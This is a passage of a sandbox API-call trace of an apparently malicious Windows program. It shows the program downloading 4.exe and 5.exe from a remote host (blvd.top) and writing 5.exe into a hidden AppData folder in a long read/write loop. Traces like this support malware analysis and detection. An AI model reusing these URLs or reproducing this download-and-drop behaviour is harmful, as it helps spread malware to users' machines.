(HeapHandle=0x260000, Flags=0x0, Size=0x850) returned 0x9b03f30 [0178.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31a9ec0 | out: hHeap=0x260000) returned 1 [0178.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f8968 | out: hHeap=0x260000) returned 1 [0178.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x850) returned 0x31a9ec0 [0178.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x827) returned 0x3235f88 [0178.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://blvd.top/files/penelop/4.exe", cchWideChar=-1, lpMultiByteStr=0x3235f88, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://blvd.top/files/penelop/4.exe", lpUsedDefaultChar=0x0) returned 36 [0178.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9af5eb0 [0178.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3235f88 | out: hHeap=0x260000) returned 1 [0178.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31a9ec0 | out: hHeap=0x260000) returned 1 [0178.458] InternetOpenUrlA (hInternet=0xcc001c, lpszUrl="http://blvd.top/files/penelop/4.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0024 [0178.626] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9af5eb0 | out: hHeap=0x260000) returned 1 [0178.626] HttpQueryInfoW (in: hRequest=0xcc0024, dwInfoLevel=0x20000013, lpBuffer=0x9a2d6d0, lpdwBufferLength=0x9a2d710, lpdwIndex=0x0 | out: lpBuffer=0x9a2d6d0*, lpdwBufferLength=0x9a2d710*=0x4, lpdwIndex=0x0) returned 1 [0178.626] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9b03f30 | out: hHeap=0x260000) returned 1 [0178.626] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0028 [0178.626] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x31f8a10 [0178.626] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x84e) returned 0x9b03f30 [0178.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31f8a10, cbMultiByte=-1, lpWideCharStr=0x9b03f30, cchWideChar=1063 | out: lpWideCharStr="http://blvd.top/files/penelop/5.exe") returned 36 [0178.626] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x850) returned 0x3235f88 [0178.626] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9b03f30 | out: hHeap=0x260000) returned 1 [0178.627] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f8a10 | out: hHeap=0x260000) returned 1 [0178.627] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x850) returned 0x9b03f30 [0178.627] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x827) returned 0x321f290 [0178.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://blvd.top/files/penelop/5.exe", cchWideChar=-1, lpMultiByteStr=0x321f290, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://blvd.top/files/penelop/5.exe", lpUsedDefaultChar=0x0) returned 36 [0178.627] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9af5eb0 [0178.627] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321f290 | out: hHeap=0x260000) returned 1 [0178.627] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9b03f30 | out: hHeap=0x260000) returned 1 [0178.627] InternetOpenUrlA (hInternet=0xcc0028, lpszUrl="http://blvd.top/files/penelop/5.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0030 [0178.812] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9af5eb0 | out: hHeap=0x260000) returned 1 [0178.812] HttpQueryInfoW (in: hRequest=0xcc0030, dwInfoLevel=0x20000013, lpBuffer=0x9a2d6d0, lpdwBufferLength=0x9a2d710, lpdwIndex=0x0 | out: lpBuffer=0x9a2d6d0*, lpdwBufferLength=0x9a2d710*=0x4, lpdwIndex=0x0) returned 1 [0178.812] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x31f8ab8 [0178.812] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f8ab8 | out: hHeap=0x260000) returned 1 [0178.812] lstrcpyA (in: lpString1=0x31b9668, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8" [0178.812] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8", pMore="5.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\5.exe") returned 1 [0178.813] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x31c0250 [0178.813] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\5.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6b8 [0178.815] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0178.815] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0178.849] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.850] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0178.886] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.886] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0178.893] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.893] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0178.927] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.928] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0178.931] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.932] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0178.932] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.933] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0178.936] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.937] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0178.965] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.966] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0178.966] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.967] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0178.967] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.967] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0178.968] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.968] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0178.975] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.975] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0178.984] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.987] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.008] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.009] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.010] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.010] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.011] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.011] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.012] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.012] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.039] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.039] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.040] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.040] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.062] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.063] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.064] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.064] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.065] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.065] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.065] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.066] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.066] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.066] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.067] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.067] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.069] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.070] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.070] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.071] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.084] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.084] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.085] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.086] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.086] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.086] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.087] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.087] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.110] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.110] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.111] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.111] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.111] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.112] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.112] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.113] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.113] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.114] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.131] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.132] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.132] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0179.133] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0179.133] WriteFile (in: hFile=0x6b8, lpBuffer=0x9a2d778*, 